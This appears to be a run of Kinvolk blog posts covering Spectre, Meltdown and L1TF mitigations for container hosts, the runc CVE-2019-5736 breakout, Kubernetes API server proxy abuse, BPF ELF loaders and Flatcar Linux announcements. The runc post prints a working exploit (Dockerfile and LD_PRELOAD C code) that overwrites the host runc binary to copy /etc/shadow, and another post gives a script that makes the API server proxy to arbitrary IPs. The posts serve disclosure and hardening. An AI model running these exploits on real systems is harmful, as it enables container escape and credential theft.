Imagine you have a “shadow CPU” that mimics your real one. To be precise, the shadow only executes load and store memory instructions but no arithmetic instructions. Shadow executes loads from memory before your real CPU gets to see those load instructions, while the real CPU is busy performing arithmetic instructions. Shadow loads very aggressively even in cases where it is likely, but not guaranteed, that the load is even necessary. Its motivation is to make data available in the CPU caches (fast access) instead of making the real CPU walk to memory (orders of magnitude slower). Eventually, the execution flow of the real CPU arrives at where the shadow already is - and the data it needs is readily available from the CPU caches. If the shadow CPU was wrong with its speculation, there’s no harm done since values in the cache cannot be read. Harm is done though when code uses the data loaded to calculate an address in a follow-up load instruction:

if (offset < upper_bound_of_memory_allowed_to_access) {   // attack uses offset > allowance
  char secret_data = *(char *)(secret_memory_ptr+offset); // never reached by “real” CPU
  unsigned long data2 = my_own_array[secret_data];        // never reached by “real” CPU
}
// TODO: use cache timing measurement to figure out which index of “my_own_array” was loaded
// into cache by “shadow”. This will reveal “secret_data”.

Spectre - the keyhole

The Spectre family of attacks—which includes Meltdown, discussed below—allow an unprivileged attacker to access privileged memory through speculative execution. Privileged memory may be OS (kernel) memory of its own process context, or private memory belonging to another application, container, or VM.

Spectre v1

The attack works by first training the branch predictor of a core to predict that specific branches are likely to be taken. A branch in this case is a program flow decision that grants or denies execution of sensitive code based on a value provided by the attacker—for instance, checking if an offset is within a legally accessible memory range. Branch predictor priming is achieved by performing a number of “legal” requests using valid offsets, until the branch predictor has learned that this branch usually enters the sensitive code. Then, the attacker attempts an illegal access as outlined above, which will be denied. But at that point, the speculative execution engine will have executed the access, using an illegal offset, and contrary to its design goal can be forced to leave an observable trace in the core’s cache. The sensitive code is speculatively executed because the branch predictor has seen that branch go into the sensitive code so many times before. But we cannot access the cache, so what gives?

The attacker’s code, while incapable of accessing the privileged data directly, may use it in a follow-up load operation, e.g. as an offset to load data from valid memory. Both reading the privileged data (I) and accessing a place in the attacker’s valid memory range using that privileged data as an offset (II) will be speculatively executed. After the illegal access has been denied, the attacker checks which memory offset from (II) is now cached. This will reveal the offset originating from (I), which reveals the privileged data.

Spectre v2

Spectre v2 builds on the fact that for indirect branches the branch predictor uses the branch target’s memory addresses to keep track of probabilities for indirect branches, and that it uses the virtual addresses of branch targets. The attacker can thus train the branch predictor to speculatively execute whatever is desired by crafting an environment that’s reasonably similar to the victim code in the attacker’s own virtual address space. This means the attacker can prime the branch predictor without ever calling the actual victim code. Only after priming is finished will the victim code be called, following a scheme similar to v1 to extract information. This lowers the restrictions of Spectre v1 with regard to exploitable victim code and makes the Spectre attack more generic and flexible.

Attacker Code:

if (my_offs < my_value) {   // branch located at a similar vmm address as 
  nop;                      // the code we later attack; we run this branch often, 
}                           // w/ legal offset, until priming completed

Victim Code (“gadget”):

if (offset < upper_bound_of_memory_allowed_to_access) {   // victim code, called ONCE, w/ bad
  char secret_data = *(char *)(secret_memory_ptr+offset); // offset - “real” doesn’t branch
  unsigned long data2 = my_own_array[secret_data];        // but “shadow” already spoiled cache
}
// TODO: use cache timing measurement to figure out which index of “my_own_array” was loaded
// into cache by “shadow”. This will reveal “secret_data”.

Spectre v4 and the SPOILER attack

While v3 is discussed below, Spectre v4 only works when the attacker’s code runs in the same address space as the victim code, but with some extra features. Spectre v4 leverages the fact that speculative reads may return “old” memory contents that have since been overwritten by a new value, depending on the concrete CPU series’ implementation of speculative reads. This allows “uninitialized” memory to be recovered for a brief amount of time even after it was overwritten (e.g. with zeroes). Concrete applications of Spectre v4 include recovering browser state information from inside a browser’s javascript sandbox, or recovering kernel information from within BPF code.

SPOILER, a recently disclosed attack, makes extended use of speculative read and write implementations and the fact that only parts of the actual virtual memory address are being used by the speculative load/store engine. The engine would consider two different addresses to be the same because it does not consider the whole of the address, leading to false positives in dependency hazard detection. SPOILER leverages this to probe the virtual address space, ultimately enabling user space applications to learn about their virtual->physical address mapping. Since the advent of ROWHAMMER, which lets attackers flip DRAM memory bits by aggressively writing patterns in neighboring memory rows, virt->phys mappings are considered security sensitive. Consequently, SPOILER, after learning about its address mapping, applies ROWHAMMER and can change memory contents this way without directly accessing them.

Meltdown (Spectre v3) - the open door

Meltdown is a variant of Spectre that works across memory protection barriers (Spectre v3) as well as across CPU system mode register protection barriers (Spectre v3a). While v1 and v2 limit the attack to memory that’s valid in at least the victim’s process context, Meltdown will allow an attacker to read memory (v3) and system registers (v3a) that are outside the attacker’s valid memory range. Accessing such memory under regular circumstances would result in a segmentation fault or bus error. Furthermore, Meltdown attacks do not need to involve priming branch predictors - these go straight to the prize of reading from memory that should be inaccessible. For illustration, the following construct will allow arbitrary access of memory mapped into the address space of the application—for instance, kernel memory where a secret is stored that should be inaccessible to user space:

char secret_data = *(char *)(secret_kernel_memory_ptr); // this will segfault
unsigned long data2 = my_own_array[secret_data];        // never reached, b/c segfault
// TODO: catch and handle SIGSEGV
// then use cache timing measurement to figure out which index of “my_own_array” was loaded
// into cache by “shadow”. This will reveal secret_data.

The Meltdown attack is based on lazy exception checking in the implementation of speculative execution in most Intel CPUs since 2008 (series initially released in 2019 or later work around this issue), as well as some implementations of ARM CPUs. When speculatively executing code, exceptions are not generated at all (making the speculative execution engine more lightweight). Instead, the exception check only happens at speculation retirement time, i.e. when the speculation meets reality and is either accepted or discarded.

With Meltdown—and contrary to Spectre v1 and v2—an attacker can craft their own code to access privileged memory (e.g. kernel space) directly, without requiring a suitable privileged function (“gadget”) to exist on the victim’s side.

Level 1 Terminal Fault - the (virtual) walls come down

L1TF once more leverages a CPU implementation detail of the speculative execution engine and also does not rely on branch prediction, so it is pretty similar to Meltdown. It works across memory boundaries and it bypasses virtualization. In fact, an L1TF attack is most powerful when attacking a bare metal host from within a virtual machine of which the attacker controls the kernel. The most basic L1TF attack would have an attacker’s application allocate memory, then wait for the memory pages to be swapped to disk—which will have the kernel’s memory management flip the “invalid” bit in the respective page’s control structure. The “invalid” bit in those control structures—which are shared between the kernel and the CPU’s hardware memory management unit—should cause two things: the page table entry being ignored by the CPU, and the kernel fetching data from disk back into physical memory if the page is accessed. However, in some implementations of speculative execution (most Intel CPUs from 2008 - 2018), the “invalid” bit is ignored.

When the attacker now reads from memory on that swapped-out page, the speculative execution engine will access actual memory content of a different process, or of the kernel (the content that replaced the attacker’s page after it was swapped to disk), and the attacker can easily retrieve those values by using it as an offset for an operation on their own (not swapped) memory, and then measuring access timings to figure out which value was cached. While this attack is reasonably difficult to mount from an application—the attacker has no control of either the page addresses or when/if the pages are swapped out—it becomes all the worse when mounted from inside a VM.

Inside a (otherwise unprivileged) VM controlled by an attacker, the VM may leverage a CPU mechanism called Extended Page Tables (EPT). EPT allows hosts to share memory management work with guests. This results in a significant performance boost for the virtual memory management, while allowing an attacker to craft suitable page table entries and mark those invalid directly, bypassing the restrictions of the basic attack described above. A malicious VM exploiting L1TF would be able to read all of its physical host’s memory, including the memory of other guests, with relative ease.

Attack Scenarios

After refreshing our memory on the mechanisms exploited to leak information via otherwise perfectly reasonable optimizations, we’ll go ahead and see how we can apply these attacks to the generic container stack we’ve built in the introduction (which, if you just worked your way through the attack details, must feel like ages ago).

Operating System level

This applies to a scenario where containers are run on bare metal, on a container-centric OS. The OS provides APIs and primitives for deploying, launching, managing, and tearing down containerized applications. Potential victims leaking information to a rogue application would be its own container control plane, the OS part of its process context, and other containers running on the same host. In order to ensure confidentiality, the container OS is required to ship with the latest security patches, and to be compiled with Retpoline enabled (a kernel build time option).

Furthermore, it would need to have run-time mitigations enabled: IBRS (kernel and user space) for Spectre v2, page table isolation (PTI) for Meltdown, speculative store bypass disable (kernel and user space) for Spectre v4, and Page Table Entry Inversion (PTE Inversion) for L1TF.

IBRS (Indirect Branch Restricted Speculation) is a control bit Intel introduced to the model-specific register (MSR) set of their CPUs.
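Whether these run-time mitigations are active can be checked through sysfs. A minimal sketch (assuming a Linux kernel new enough to expose /sys/devices/system/cpu/vulnerabilities, i.e. 4.15 or later; the directory parameter exists only so the helper can be exercised against a copy):

```shell
# Print the kernel's own report on each known hardware vulnerability.
# The directory defaults to the real sysfs path; passing another directory
# is only useful for testing this helper.
show_mitigations() {
  dir=${1:-/sys/devices/system/cpu/vulnerabilities}
  for f in "$dir"/*; do
    printf '%s: %s\n' "$(basename "$f")" "$(cat "$f")"
  done
}
```

On a patched host, `show_mitigations` prints lines such as `l1tf: Mitigation: PTE Inversion` or `spectre_v2: Mitigation: Retpolines`.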

Security-focused Linux container OSs like Flatcar Linux enable such measures by default. In order to further secure the container control plane from being spied on by its own application, the control plane and accompanying libraries need to be compiled in a way that emits protective instructions around potential Spectre gadgets (e.g. -mindirect-branch=thunk, -mindirect-branch-register, -mfunction-return=thunk for gcc).

Virtualization environments

Virtualization environments suffer from an additional vector of attack that makes it significantly easier for the attacker to craft page mappings that exploit L1TF, if the attacker is able to gain control of the guest kernel. We classify virtualization environments into two categories.

Restricted Virtualization environments (“no root”, unprivileged containers)

Restricted virtualization environments, while providing virtualization services to container clusters, restrict access within the virtualization guest: unprivileged users run the workloads, and the guest OS kernel cannot be changed by a third party. This approach requires that the operator remains in full control over both VMs and VM guest kernels at any point in time.

Appropriate monitoring needs to be in place to ensure that a malicious application does not break out of its unprivileged container and subsequently gain the rights to mutate kernel code, e.g. by loading custom kernel modules or even booting into a custom kernel. That would ultimately allow attackers to work around the PTE Inversion mitigation in particular, with significant security impact.

With full control over VM and instance kernels, the Operating System level mitigations discussed in the previous section will secure the stack.

Unrestricted Virtualization environments (“got root”, privileged containers)

Unrestricted virtualization environments, even when not “officially” allowing for custom kernels, provide root access to 3rd parties and are therefore at risk of kernel mutations anyway, such as rogue module loads or even booting a custom kernel. This will allow an attacker to craft custom page table entries, greatly enhancing the impact of the L1TF attack in particular.

From here on, working around those hardware vulnerabilities will hurt performance.

Keeping control of the guest kernel

Before we discuss mitigations for a scenario where we don’t control the guest kernel, let’s have a look at our options for retaining control even in privileged environments. The goal is to ensure that the VM kernel cannot be modified—e.g. through loading a kernel module—or otherwise mutated, even with VM root access available. A technical way to achieve this, provided by some virtualization systems (most notably qemu), is direct kernel boot: the guest is started with a kernel that is not on the VM filesystem image but resides on the bare metal virtualization host and is handed to the hypervisor when the VM is started. Since VMs do not have access to host file systems, the VM kernel cannot be modified even with VM root access. This approach requires the operator to provide and maintain custom Linux kernel builds tailored to their infrastructure. To lock the configuration down fully, module loading should be restricted (a monolithic kernel, or kernel module signing so only “legal” modules can still be loaded) and kexec support removed. Security focused distributions like Flatcar Linux are working towards enabling locked-down kernel configurations like the above.

With the guest kernel remaining firmly under the control of the operator, Operating System level mitigations like PTE inversion (which cannot be worked around from inside the VM’s user space) will once more secure the system.

Pinning VM CPUs (vCPUs) to physical CPUs (pCPU)

In order to have VMs of varying trust levels continue to share the same physical host, we might investigate ensuring that VMs never share the same L1 cache. The technical way to achieve this is vCPU -> pCPU pinning. In this scenario, virtualization workloads must not be CPU over-committed: one virtual CPU equals one physical CPU, and each physical CPU serves the same VM. Application level over-commitment, i.e. running more applications (or containers) inside of a VM than there are CPUs, may be applied to saturate system usage. Alternatively, VMs may be grouped by trust level, and the virtual cores of VMs of the same trust level may be pinned to the same group of physical CPUs.

When the guest kernel cannot be controlled and we therefore need to anticipate attacks from the VM kernel, we need to secure the physical host’s OS as well as other VMs running on the same host. L1TF attacks mounted from VM kernels have significantly higher impact than malicious user space applications trying to leverage L1TF: specific hardware acceleration in a CPU’s memory management unit—the EPT feature from above—allows guests to manage their page tables directly, bypassing the host kernel. EPT, while providing a significant speed-up to VM memory management, poses a potential security risk for the bare metal host’s OS, as page table entries suitable for exploiting L1TF can be crafted directly.

First, though, we need to take a step back and reconsider sandboxing, as in this scenario containers in the same VM cannot be considered isolated anymore. Isolation now happens solely at the VM level, implying that only containers of the same trust level may share a VM—which is likely to cause repercussions on a cluster’s hardware saturation and maintenance operations. With CPU pinning, a host’s CPUs are statically partitioned into “VM slots”, and there’s a maximum number of VMs that can run on a host to ensure CPUs are never shared between VMs (or between trust levels). CPU pinning allows guest OS kernels to be in control of 3rd parties without impacting the security of other VMs running on the same physical host.
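As an illustration, with libvirt-managed VMs such pinning can be configured per vCPU (the domain name guest1 is hypothetical):

```shell
# Config sketch: pin vCPUs 0 and 1 of the hypothetical domain "guest1" to
# physical CPUs 2 and 3, so this VM's L1 caches are never shared with
# another guest. Requires libvirt's virsh and admin privileges.
virsh vcpupin guest1 0 2 --config
virsh vcpupin guest1 1 3 --config
```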

To further secure the operating system of the physical host, which may also leak information via the L1 data cache when the VM task-switches into the physical host’s kernel via a hypercall, the L1 data cache needs to be flushed before the VM context is entered from the host OS. KVM provides a module parameter, kvm-intel.vmentry_l1d_flush (l1d for level-1 data cache), that controls this flushing. The option can be set to either “always” or “cond” (it can also be deactivated by supplying “never”). “always” will flush the L1 data cache every time a VM is scheduled off a CPU, while “cond” will try to figure out whether a vulnerable code path was executed and only flush if required. This option will impact application performance as the L1D cache will need refilling after each schedule event, which it otherwise would not—but since refilling will happen from the L2 cache, the overall performance impact is expected to be mild.
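As a configuration sketch (assuming the kvm_intel module is in use), the flush policy can be chosen on the kernel command line or via modprobe configuration, and inspected at runtime:

```shell
# On the kernel command line:  kvm-intel.vmentry_l1d_flush=cond
# Or persisted as a module option (needs root):
echo 'options kvm_intel vmentry_l1d_flush=cond' > /etc/modprobe.d/l1tf.conf
# The currently active policy is visible in sysfs:
cat /sys/module/kvm_intel/parameters/vmentry_l1d_flush
```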

Securing the Virtualization runtime against L1TF

If we cannot control the guest kernel, and if we also cannot pin vCPUs to pCPUs in a way that multiple VMs do not share L1 caches, we need to work around the L1TF hardware vulnerability by use of software mitigations at the virtualization layer—that is, the bare metal host kernel and hypervisor. These mitigations will impact the overall system performance, though the level of impact is application specific. Software mitigation against L1TF is two-fold. Both attack vectors need to be mitigated:

  1. Secure active VMs against attacks from other VMs being active at the same time
  2. Secure the L1 cache data of a VM that is becoming inactive against the next VM that is to use the same physical CPU, or against the host OS itself (see above).

To mitigate 1., either the Hyperthreading or the EPT CPU feature needs to be disabled on the physical virtualization host. While the performance impact is application specific, overall performance gains published at the time the respective technology was introduced suggest it may be less painful to disable Hyperthreading over deactivating EPT. In any case, operators should monitor the impact on their real-life workloads, and experiment with changing mitigations to determine the least painful measure.
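As a configuration sketch, on Linux 4.19 and later Hyperthreading can be toggled at runtime through sysfs, or disabled at boot with the nosmt kernel command line parameter:

```shell
# Inspect the current SMT state: on / off / forceoff / notsupported.
cat /sys/devices/system/cpu/smt/control
# Disable SMT at runtime (needs root); sibling threads are offlined.
echo off > /sys/devices/system/cpu/smt/control
```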

In order to prevent data leaks via the L1 cache after a VM was scheduled off a pCPU, the L1 cache must be flushed before the next VM starts using that pCPU, similar to the physical OS protection discussed in the previous section. The same mechanism via KVM’s kvm-intel.vmentry_l1d_flush option applies here.

Future outlook / potential long-term options

Caches, and Hyperthreading in particular, have been under sustained attack from this new generation of hardware-level information disclosures, with security researchers warning about potential inherent vulnerabilities, and e.g. the OpenBSD project disabling Hyperthreading completely for security reasons. However, even when factoring in the vulnerability drawbacks, valid use-cases for Hyperthreading remain. For example, a multi-threaded application, which shares its memory among its threads anyway, would benefit without being vulnerable per se. However, currently no scheduler in the Linux kernel is advanced enough to perform this level of scheduling—appointing sets of processes or threads to a set of cores or hyperthreads of the same core, while locking all other processes out of those cores.

But something is in the works. A patch-set of no less than 60 individual patches proposed for the Linux kernel’s CFS scheduler in September 2018 started a discussion about adding co-scheduling capabilities to Linux. While this particular patch-set appears to have been abandoned (with the discussion apparently concluded), the general direction of this work continues to be pursued. More recently the maintainer of the Linux scheduler subsystem, Peter Zijlstra, proposed his own patch series to tackle this feature.

If you need help improving the security of your Kubernetes environment, please contact us at [email protected].

runc “breakout” Vulnerability Mitigated on Flatcar Linux

Last week, a high severity vulnerability was disclosed by the maintainers of runc, under the name CVE-2019-5736: runc container breakout. This vulnerability has high severity (CVSS score 7.2) because it allows a malicious container to overwrite the host runc binary and gain root privileges on the host. According to our research, however, when using Flatcar Linux with its read-only filesystems this vulnerability is not exploitable.

runc vulnerability background

In the context of our security work, we had been asked to evaluate the report’s severity with respect to the client’s installation. In the course of this evaluation, we wrote an exploit in order to understand how it works and to test if their installation was vulnerable. While we did recognize the severity of the issue, we also ascertained that the client was not affected. To understand this, let’s take a look at how things should work versus what could happen if the exploit was successfully executed.

How containers should work

Let’s first look at the following diagram showing how runc should work.

runc forks a new process that becomes the pid1 of the container. Following the traditional fork/exec Unix model, that process is at first only a copy of the parent process and therefore still runs the “runc” program. At this point, /proc/self/exe points to runc while running in the container.

Then, pid1 will execute the entrypoint of the container image, meaning the running program will be replaced by the program from the container.
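The property the exploit later abuses can be seen with a one-liner: a process’s /proc/&lt;pid&gt;/exe link names the program it is currently running, and only changes once execve() replaces the process image.

```shell
# The shell spawned by `sh -c` reads its own exe symlink; before it execs
# anything else, the link still points at the shell binary itself.
sh -c 'readlink "/proc/$$/exe"'
```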

How our runc exploit works

The runc exploit code changes the normal behaviour in the following ways:

  • Instead of executing our own program in the container, we set the entrypoint to /proc/self/exe, meaning runc will run runc again. As a result, /proc/1/exe will keep pointing to runc for a while.

  • However, we don’t want to run the runc code. With LD_PRELOAD, we instead execute a routine that sleeps for a few seconds in order to keep the /proc/1/exe reference alive for the next step.

  • During those few seconds, we have enough time to enter the container with runc exec and open a reference to /proc/1/exe, while it is still pointing to runc (file descriptor 10 in our exploit).

  • At this point, we cannot open runc in read-write mode because pid1 is still running runc. We would get the error “Text file busy” (ETXTBSY) if we tried.

  • When the sleep in pid1 terminates, pid1 executes something else (another sleep, but via /bin/sh, so that pid1 no longer keeps the runc binary busy).

  • Finally, we still hold a read-only file descriptor to the runc binary on the host filesystem, and we use tee /proc/self/fd/10 to acquire a new file descriptor in write mode and overwrite the runc binary.

Our exploit container image is simply a LD_PRELOAD program:

FROM fedora:latest
RUN ln -s /proc/self/exe /exe
RUN dnf install -y gcc
RUN mkdir -p /src
COPY foo.c /
RUN gcc -Wall -o /foo.so -shared -fPIC /foo.c -ldl
ENV LD_PRELOAD=/foo.so
CMD [ "/exe" ]

Here is the source code:

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <dlfcn.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>

static void __myinit(void) __attribute__((constructor));
static void __myinit(void)
{
  int pid;

  pid = getpid();
  if (pid == 1) {
    printf("I am pid 1. Sleeping 3 seconds...\n");
    sleep(3);
    printf("I am pid 1. Sleeping forever...\n");
    execl("/bin/sh", "sh", "-c",
          "/bin/sleep 1000",
          (char *) 0);
  }

  printf("I am pid %d. Starting Hijack...\n", pid);
  execl("/bin/sh", "sh", "-c",
        "exec 10< /proc/1/exe ; "
        "echo Lookup inode of /proc/1/exe: ; "
        "stat -L --format=%i /proc/1/exe ; "
        "echo sleep 4 ; "
        "sleep 4 ; "
        "printf '#!/bin/sh\\ncp /etc/shadow /home/ubuntu/\\nchmod 444 /home/ubuntu/shadow\\n' | tee /proc/self/fd/10 > /dev/null ; "
        "echo done ; ",
        (char *) 0);
}

This program is a single constructor function compiled into a shared library, loaded via the environment variable $LD_PRELOAD. It will be executed both by the initial process in the container (pid 1) and whenever entering the container with docker exec. If it’s running as pid 1 (if (pid == 1)), it will run the red part of the diagram above. If it’s running via docker exec, it will run the bottom part of the diagram above.

Running the exploit on Ubuntu

When trying this on Ubuntu, we can overwrite runc on the host.

When executing the exploit, /usr/bin/docker-runc is overwritten by the malicious script that copies the password file /etc/shadow from the host, making it available for others to read.

Trying the exploit on Flatcar Linux

Then, we tried the same exploit on Flatcar Linux and we couldn’t reach the same result.

Flatcar Linux mounts /usr in read-only mode, protecting most programs from being overwritten. However, this test does not use runc from /usr/bin/runc but from /run/torcx/unpack/docker/bin/runc (managed by torcx). But torcx also uses a read-only mount for its programs, so it is protected in the same way.
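This can be verified directly on a host. A small sketch (assuming util-linux’s findmnt for the real check; the helper itself only inspects an option string, so it can be tested anywhere):

```shell
# Return success if a comma-separated mount option string (as printed by
# `findmnt -no OPTIONS <path>`) contains the read-only flag.
mount_is_ro() {
  printf '%s\n' "$1" | tr ',' '\n' | grep -qx ro
}

# On a Flatcar host one would run, e.g.:
#   mount_is_ro "$(findmnt -no OPTIONS /usr)" && echo "/usr is read-only"
```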


As we have demonstrated, the read-only filesystems feature of Flatcar Linux is capable of mitigating this runc vulnerability. It can also help against similar exploits of this class. In addition, Flatcar Linux delivers updates automatically, including security fixes. These are some of the reasons we are pushing Flatcar Linux forward and using it as the base for our upcoming open source products.

Since developing our own exploit, the researchers who found this vulnerability and the maintainers of runc have also published their exploit, which works in a similar way.

If you want to learn more about Flatcar Linux, head over to the Flatcar Linux website.

If you need help with security assessments, penetration testing, or engineering services contact us at [email protected].

Abusing Kubernetes API server proxying

The Kubernetes API server proxy allows a user outside of a Kubernetes cluster to connect to cluster IPs which otherwise might not be reachable. For example, this allows accessing a service which is only exposed within the cluster’s network. The apiserver acts as a proxy and bastion between user and in-cluster endpoint.

API server proxy security advisory

Last summer, while performing penetration testing, we found an issue with Kubernetes API server proxying. We took this discovery to the private Kubernetes security list, which recently led to a security advisory.

Operators are strongly advised to run the Kubernetes API server in the same network as the nodes, or to firewall it sufficiently. It is highly recommended not to run any other services you wish to keep secure and isolated on the same network as the cluster, unless you firewall them away from the cluster, specifically from any outbound connections from the API server. The Kubernetes control plane has many user-configurable features (aggregated APIs, dynamic admission webhooks, and conversion webhooks coming soon) which involve the Kubernetes API server sourcing network traffic.

Prior to the advisory, an update to Kubernetes was made that disabled proxy functionality for loopback and link-local addresses. That makes it no longer possible to abuse apiserver proxying for pods to reach, for example, sidecar containers or the well-known link-local address This address is commonly used for metadata services in cloud environments (e.g. AWS) and often gives access to secret data.

API server remains open to abuse

It’s great that we’ve now got those cases covered, but the apiserver still can be abused as an open HTTP proxy. Thus, it remains crucial to isolate the network correctly. Let’s take a closer look to understand why this is.

The interesting question to investigate is, “Can we trick the apiserver into connecting to IP addresses that are not part of the cluster’s network and not assigned to a pod or service in the cluster?” Additionally, in a Kubernetes setup where the Kubernetes API server is operated in a different network than the worker nodes (as for example on GKE): can we abuse the apiserver’s built-in proxy to send requests to IP addresses within the apiserver’s network or to sidecar containers of it (in a self-hosted Kubernetes cluster) that are not meant to be reachable for users at all?

When the apiserver receives a proxy request for a service or pod, it looks up an endpoint or pod IP address to forward the request to. Both endpoint and pod IP are populated from the pod’s status which contains the podIP field as reported by the kubelet. So what happens if we send our own pod status for a nginx pod as shown in the following script?


#!/bin/bash
set -euo pipefail

readonly PORT=8001
readonly POD=nginx-7db75b8b78-r7p79
readonly TARGETIP=  # the out-of-cluster IP to inject

while true; do
  curl -v -H 'Content-Type: application/json' \
    "http://localhost:${PORT}/api/v1/namespaces/default/pods/${POD}/status" >"${POD}-orig.json"

  sed 's/"podIP": ".*",/"podIP": "'${TARGETIP}'",/g' \
    "${POD}-orig.json" >"${POD}-patched.json"

  curl -v -H 'Content-Type: application/merge-patch+json' \
    -X PATCH -d "@${POD}-patched.json" \
    "http://localhost:${PORT}/api/v1/namespaces/default/pods/${POD}/status"

  rm -f "${POD}-orig.json" "${POD}-patched.json"
done

From the apiserver’s perspective, the pod now has the target IP address we injected. When we try to connect to the pod via kubectl proxy, the apiserver will in fact establish an HTTP connection to our target IP.

curl localhost:8001/api/v1/namespaces/default/pods/nginx-7db75b8b78-r7p79/proxy/
<a href="//"/><span id="logo" aria-label="Google"></span></a>

As demonstrated, we can indeed trick the apiserver. The moral of this story is to follow the advisory’s recommendation and isolate your network properly.

If you need help improving the security of your Kubernetes environment, please contact us at [email protected].

Kinvolk welcomes Thilo Fromm as Director of Engineering

Today we are pleased to announce Thilo Fromm has joined Kinvolk as Director of Engineering. He comes to us from Amazon Web Services, where he was a Technical Project Manager on the EC2 team. Before that he worked at ProfitBricks on virtual machine and cloud-focused Linux kernel projects.

As Director of Engineering, Thilo will be responsible for overseeing our engineering team and its efforts. He brings with him a valuable combination of technical expertise and project management skills that will be crucial in helping us grow our engineering team and expand our technical service and product offerings. The result will be increased value to our clients and the open source projects and communities to which we contribute.

Our guiding principle at Kinvolk is to be a valuable contributor to the open-source projects and communities that we participate in. With the addition of Thilo, the Kinvolk team gains another long-time contributor and supporter of open-source Linux projects. His passion for free and open-source software mirrors that of the founding team, making Thilo a perfect fit.

Adding Thilo to the team kicks off a very exciting 2019 for Kinvolk. Over the next few months, we will be announcing new products, services and events. In order to deliver those, we’ll be announcing further additions to the leadership team in the near future. Stay tuned for those announcements and other posts by subscribing to our channels.

Improving Kubernetes Security

In summer 2018, the Gardener project team asked Kinvolk to execute several penetration tests in its role as a third-party contractor. We applied our Kubernetes expertise to identify vulnerabilities on Gardener installations and to make recommendations.

Some of our findings are now presented in this article on the Gardener website.

We presented some of our findings in a joint presentation with SAP entitled Hardening Multi-Cloud Kubernetes Clusters as a Service at KubeCon 2018 in Shanghai. The slides in PDF and the video recording are now available.

We also presented it at the Gardener Bi-weekly Meeting, see the agenda for Friday 7 Dec 2018.

If you need help with penetration testing your installation, please contact us at [email protected].

Exploring BPF ELF Loaders at the BPF Hackfest

Just before the All Systems Go! conference, we had a BPF Hackfest at the Kinvolk office and one of the topics of discussion was to document different BPF ELF loaders. This blog post is the result of it.

BPF is a new technology in the Linux kernel, which allows running custom code attached to kernel functions, network cards, or sockets amongst others. Since it is very versatile a plethora of tools can be used to work with BPF code: perf record, tc from iproute2, libbcc, etc. Each of these tools has a different focus, but they use the same Linux facilities to achieve their goals. This post documents the steps they use to load BPF into the kernel.

Common steps

BPF is usually compiled from C, using clang, and “linked” into a single ELF file. The exact format of the ELF file depends on the specific tool, but there are some common points. ELF sections are used to distinguish map definitions and executable code. Each code section usually contains a single, fully inlined function.

The loader creates maps from the definition in the ELF using the bpf(BPF_MAP_CREATE) syscall and saves the returned file descriptors [1]. This is where the first complication comes in, because the loader now has to rewrite all references to a particular map with the file descriptor returned by the bpf() syscall. It does this by iterating through the symbol and relocation tables contained in the ELF, which yields an offset into a code section. It then patches the instruction at that offset to use the correct fd [2].

After this fixup is done, the loader uses bpf(BPF_PROG_LOAD) with the patched bytecode [3]. The BPF verifier resolves map fds to the in-kernel data structure, and verifies that the code is using the maps correctly. The kernel rejects the code if it references invalid file descriptors. This means that the outcome of BPF_PROG_LOAD depends on the environment of the calling process.

After the BPF program is successfully loaded, it can be attached to a variety of kernel subsystems [4]. Some subsystems use a simple syscall (e.g. SO_ATTACH), while others require netlink messages (XDP) or manipulating the tracefs (kprobes, tracepoints).
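The four steps above can be summarized in pseudocode (names are illustrative, not an actual loader API):

```
parse ELF sections (maps, code, symbols, relocations)
for each map definition:
    map_fd[name] = bpf(BPF_MAP_CREATE, definition)        # [1]
for each relocation entry (symbol -> offset in code):
    patch instruction at offset to use map_fd[symbol]     # [2]
prog_fd = bpf(BPF_PROG_LOAD, patched bytecode)            # [3] verifier checks map fds
attach prog_fd via setsockopt / netlink / tracefs         # [4]
```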

Small differences between BPF ELF loaders

The different loaders offer different features and for that reason use slightly different conventions in the ELF file. The ELF conventions are not part of the Linux ABI, which means that an ELF file prepared for one loader usually cannot simply be loaded by another one. The map definition struct (e.g. struct bpf_elf_map in iproute2) is the main varying part.

BPF ELF loader        | Maps in maps | Pinning                            | NUMA node         | bpf2bpf function call
libbpf (Linux kernel) | no           | no                                 | yes (via samples) | yes
perf                  | no           | no                                 | no                | yes
iproute2 / tc         | yes          | yes (none, object, global)         | no                | yes
gobpf                 | not yet      | yes (none, object, global, custom) | no                | no
newtools/ebpf         | yes          | no                                 | no                | yes

There are other varying parts in loader ELF conventions that we found noteworthy:

  • Some use one ELF section per map, some use one “maps” section for all the maps.
  • The naming of the sections and the function entrypoint varies. Some loaders have default section names that can be overridden on the CLI (tc), some require well-known prefixes (“kprobe/”, “kretprobe/”).
  • Some use csv-style parameters in the section name (perf), some provide a Go API to programmatically change the loader’s behaviour.


BPF is actively developed in the Linux kernel, and whenever a new feature is implemented, BPF ELF loaders might need an update as well to support it. The different BPF ELF loaders have different focuses and might not add support for new BPF kernel features at the same speed. There are efforts underway to standardise on libbpf as the canonical implementation. The plan is to ship libbpf with the kernel, which means it will set the de-facto standard for user space BPF support.

Flatcar Linux is now open to the public

A few weeks ago we announced Flatcar Linux, our effort to create a commercially supported fork of CoreOS’ Container Linux. You can find the reasoning for the fork in our FAQ.

Since then we’ve been testing, improving our build process, establishing security procedures, and talking to testers about their experiences. We are now satisfied that Flatcar Linux is a stable and reliable container operating system that can be used in production clusters.

Open to the public

Thus, today we are ready to open Flatcar Linux to the public. Thanks to our testers for their time and feedback. We look forward to more community feedback now that Flatcar is more widely available.

For information about release and signing keys, please see the new Releases and the image signing key pages.

Filing issues or feature requests

You can use the Flatcar repository to file any issue or feature request you may have.

Flatcar Linux documentation

We are also happy to announce the initial release of our Flatcar Documentation. You can find information about installing and running Flatcar there.

Communication channels

We’ve created a mailing list and IRC channels to facilitate communications between users and developers of Flatcar Linux.

Please join those to talk about Flatcar Linux and discuss any issues or ideas you have. We look forward to hearing from you there!

Flatcar Linux @ Kubecon EU

The Kinvolk team will be on hand at Kubecon EU to discuss Flatcar Linux. Come by booth SU-C23 and say “Hi!”.


Flatcar Linux would not exist without Container Linux. We thank the CoreOS team for building it and look forward to continued cooperation with their team.

Please follow Kinvolk and the Flatcar Linux project on twitter to stay informed about commercial support and other Flatcar Linux updates in the coming weeks and months.

Towards unprivileged container builds

Once upon a time, software was built and installed with the classic triptych ./configure, make, make install. The build part with make didn’t need to be run as root, which was, in fact, discouraged.

Later, software started being distributed through package managers and built with rpm or dpkg-buildpackage. Building packages as root was still unnecessary and discouraged. Since rpm or deb packages are just archive files, there shouldn’t be any need for privileged operations to build them. After all, we don’t need the ability to load a kernel module or reconfigure the network to create an archive file.

